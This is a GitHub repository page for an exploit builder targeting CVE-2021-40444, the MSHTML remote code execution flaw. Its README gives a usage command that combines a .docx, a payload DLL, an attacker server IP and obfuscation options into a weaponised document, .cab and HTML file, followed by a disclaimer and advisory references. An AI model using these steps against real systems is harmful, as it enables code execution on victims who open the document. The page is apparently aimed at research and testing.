Skip to content

H0j3n/CVE-2021-40444

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
document
document
 
 
html
html
 
 
src
src
 
 
README.md
README.md
 
 
gen.py
gen.py
 
 
requirements.txt
requirements.txt
 
 
setup.sh
setup.sh
 
 

Repository files navigation

CVE-2021-40444

Usage

Ensure to run setup.sh first as you will need few directories. Once you have run the script, you should be able to run gen.py with the example given:-

# Usage
python3 gen.py -d document/Sample.docx -p payload/payload.dll -i "http://10.10.10.10" -t html/template.html -c payload.cab -f nothing.inf -r Sample2.docx -obf 3

# Flag
-d -> Our .docx file that already been modified with Bitmap Object whether in header, document or footer
-i -> IP Address
-p -> Payload (.dll)
-t -> HTML File with Javascript
-r -> Rename the output of modified .docx 
-c -> Rename the output of patched .cab
-f -> Rename the output of .inf 
-obf -> Extra : Comes with 3 mode (HTML Entity, UTF-16BE or Both)
-v -> Increase output verbosity

Notes

  1. The location of http.server will be in web directory. This directory will have 3 files:-
  • .cab
  • .html
  • .docx

Without Verbose

without_verbose

With Verbose

with_verbose

Disclaimer

This repository is for educational purpose only and not intended to be used in the wild for bad intention. Any illegal use of this repo is strictly at your own responsibilty and risk.

References

  1. https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444
  2. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444
  3. https://github.com/klezVirus/CVE-2021-40444
  4. https://github.com/lockedbyte/CVE-2021-40444
  5. https://trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html
  6. https://tenable.com/blog/microsoft-s-september-2021-patch-tuesday-addresses-60-cves-cve-2021-40444
  7. https://news.sophos.com/en-us/2021/09/14/big-office-bug-squashed-for-september-2021s-patch-tuesday/
  8. https://huntress.com/blog/cybersecurity-advisory-hackers-are-exploiting-cve-2021-40444
  9. https://microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/
  10. https://xret2pwn.github.io/CVE-2021-40444-Analysis-and-Exploit/
  11. https://blog.sunggwanchoi.com/remote-template-injection/
  12. https://youtube.com/watch?v=dgdx3QqPCuA
  13. https://businessinsights.bitdefender.com/technical-advisory-zero-day-vulnerability-in-microsoft-mshtml-allows-remote-code-execution

About

No description or website provided.

Topics

cve-2021-40444

Resources

Readme
Activity

Stars

9 stars

Watchers

1 watching

Forks

4 forks
Report repository

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages